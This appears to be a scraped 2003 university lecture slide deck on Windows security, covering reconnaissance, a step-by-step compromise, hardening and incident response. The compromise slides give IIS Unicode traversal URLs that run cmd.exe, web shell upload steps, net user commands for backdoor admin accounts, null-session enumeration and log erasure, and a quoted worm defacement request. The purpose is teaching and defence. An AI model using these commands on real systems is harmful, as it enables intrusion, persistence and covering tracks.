520 likes | 632 Views
Windows Security Analysis Computer Science E-Commerce Security ‘2003’ Matthew Cook http://escarpment.net/. Introduction. Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/. Windows Security Analysis. Introduction
E N D
Windows Security AnalysisComputer Science E-Commerce Security ‘2003’ Matthew Cookhttp://escarpment.net/
Introduction Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/
Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Incident Response • Further Reading
Introduction Basic Security Overview
Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels
Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)
Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency
The Easiest Security Improvement • Good passwords • Usernames and Passwords are the primary security defence • Use a password that is easy to type to avoid ‘Shoulder Surfers’ • Use the first letters from song titles, song lyrics or film quotations
Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier
Step-by-step Machine Compromise Why, where, how?
Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity
Gathering Information • Companies House • Internet SearchURL: http://www.google.co.uk • WhoisURL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The Registrant • The Domain Names Registered • The Administrative, Technical and Billing Contact • Record updated and created date stamps • DNS Servers for the Domain
Gathering Information… • Use Nslookup or dig • dig @<dns server> <machine address> • Different query type available: • A – Network address • Any – All or Any Information available • Mx – Mail exchange records • Soa – Zone of Authority • Hinfo – Host information • Axfr – Zone Transfer • Txt – Additional strings
Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication
Nmap • Port Scanning Tool • Stealth scanning, OS Fingerprinting • Open Source • Runs under Unix based OS • Port development for Win32 • URL: http://www.insure.org/nmap/
Nessus • Remote security scanner • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/
pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs Administrative Privilidges • Extracts hashs even if syskey is installed • Extract from remote machines • Identifies accounts with no password • Self contained utility
L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/
L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file
Nmap Analysis • nmap –sP 158.125.0.0/16 • Ping scan! • nmap –sS158.125.0.0/16 - Stealth scan
Nmap Analysis… • TCP Connect Scan • Completes a ‘Three Way Handshake’ • Very noisy (Detection by IDS)
Nmap Analysis… • TCP SYN Scan • Half open scanning (Full port TCP connection not made) • Less noisy than the TCP Connect Scan
Nmap Analysis… • TCP FIN Scan • FIN Packet sent to target port • RST returned for all closed ports • Mostly works UNIX based TCP/IP Stacks • TCP Xmas Tree Scan • Sends a FIN, URG and PUSH packet • RST returned for all closed ports • TCP Null Scan • Turns off all flags • RST returned for all closed ports • UDP Scan • UDP Packet sent to target port • “ICMP Port Unreachable” for closed ports
Null Authentication Null Authentication: • Net use \\camford\IPC$ “” /u:“” • Famous tools like ‘Red Button’ • Net view \\camford • List of Users, groups and shares • Last logged on date • Last password change • Much more…
Exploiting the Security Hole • Using IIS Unicode/Directory Traversal • /scripts/../../winnt/system32/cmd.exe /c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • Displays the listing of c: in browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers
Gaining ‘Root’ • Cmdasp.asp provides a cmd shell in the SYSTEM context • Increase in privileges is now simple • ISAPI.dll – RevertToSelf (Horovitz) • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-26 • NOT included in Windows 2000 SP2
Backdoor Access • Create several user accounts • Net user iisservice <pass> /ADD • Net localgroup administrators iisservice /ADD • Add root shells on high end ports • Tiri is 3Kb in size • Add backdoors to ‘Run’ registry keys
System Alteration • Web page alteration • Information Theft • Enable services • Add VNC • Creating a Warez Server • Net start msftpsvc • Check access • Upload file 1Mb in size • Advertise as a warez server
Audit Trail Removal • Many machines have auditing disabled • Main problems are IIS logs • DoS IIS before logs sync to disc • Erase logs from hard disc • Erasing Eventlog harder • IDS Systems • Network Monitoring at firewall
Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!
NetBIOS/SMB Services • NetBIOS Browsing Request [UDP 137] • NetBIOS Browsing Response [UDP 138] • NetBIOS Communications [TCP 135] • CIFS [TCP 139, 445 UDP 445] • Port 445 Windows 2000 only • Block ports at firewall • Netstat -A
NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
NetBIOS/SMB Services… Disable Null Authentication • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2! • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1
Operating System Patching • Operating Systems do contain bugs, and patches are a common method of distributing these fixes. • A patch or hot fix usually contains a fix for one discovered bug. • Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows 2000.
Operating System Patching… • Only install patches after you have tested them in a development environment. • Only install patches obtained direct from the vendor. • Install security patches as soon as possible after released. • Install feature patches as and when needed. • Automate patch collection and installation as much as possible (QChain).
Operating System Patching… Use automated patching technology: • SUS – Microsoft Software Update Service • SMS – Microsoft Systems Management Server • Ghost – Symantec imaging software. And other application deployment software: • Lights out Distribution • Deferred installation
Baseline Security Analyzer • Freely available from Microsoft • Written by Shavlik Technologies as a direct result of Code Red attacks • A GUI to HFNetChk (v3.81) • Improved feature set • Integrated SUS functionality
Baseline Security Analyzer… MBSA v1.1 supports the following host OS: • Windows 2000 Professional / Server • Windows XP Home / Professional • Windows .NET not officially supported • Windows NT not supported as host OS • Remote scanning available
Baseline Security Analyzer… What applications does MBSA scan? • Operating system • Internet Explorer > 5.01 • Microsoft Office 2000 and 2002 • Media Player > 6.4 • Internet Information Services 4.0 and 5.0 • SQL Server 7.0 and 2000 • Exchange Server 5.5 and 2000
IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/
Recent Worms • Sadmind/IISDirectory Traversal (Unicode Exploit) • CodeRedida/idq buffer overflow • CodeGreen ida/idq buffer overflow • NimdaDirectory Traversal (Unicode Exploit) • SlammerMS SQL Server transaction control
Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
IDS Snort • IDS – Intrusion Detection System • Libpcap packet sniffer and logger • Originally developed for the Unix platforms • Open Source • Port to Win32 available (Release 1.8.1) • Installation on Win32 in under 30 minutes • Run on your IIS server or standalone
IDS Snort… Snort can detect: • Stealth Port Scans • CGI Attacks • Front Page Extensions Attacks • ICMP Activity • SMTP Activity • SQL Activity • SMB Probes
Incident Response What to do when something does go wrong!
Incident Response… • Don’t Panic! • Unplug the network • Get a notebook • Back-up the system and keep the Back-ups • Restrict use of email • Look for information • Investigate the cause • Request help and assistance.
Incident Response… • Important to return to service swiftly • Do not jeopardize security • If in doubt, re-build • Perform forensics on a backup • Keep documentation and evidence • Contact local CERT if investigation proves non worm/script kiddie activity.
Further Reading • Garfinkel, S. Web Security & CommerceO’Reilly [ISBN 1-56592-269-7] • Hassler, V. Security Fundamentals for E-Commerce Artech House [ISBN 1-58053-108-3] • Huth, M R A. Secure Communicating Systems Cambridge Uni Press [ISBN 0-52180-731-X] • Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Useful Books, Tools and URLs • Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) • Incident Response. (Kenneth R. van Wyk, Richard Forno.) • Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) • Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)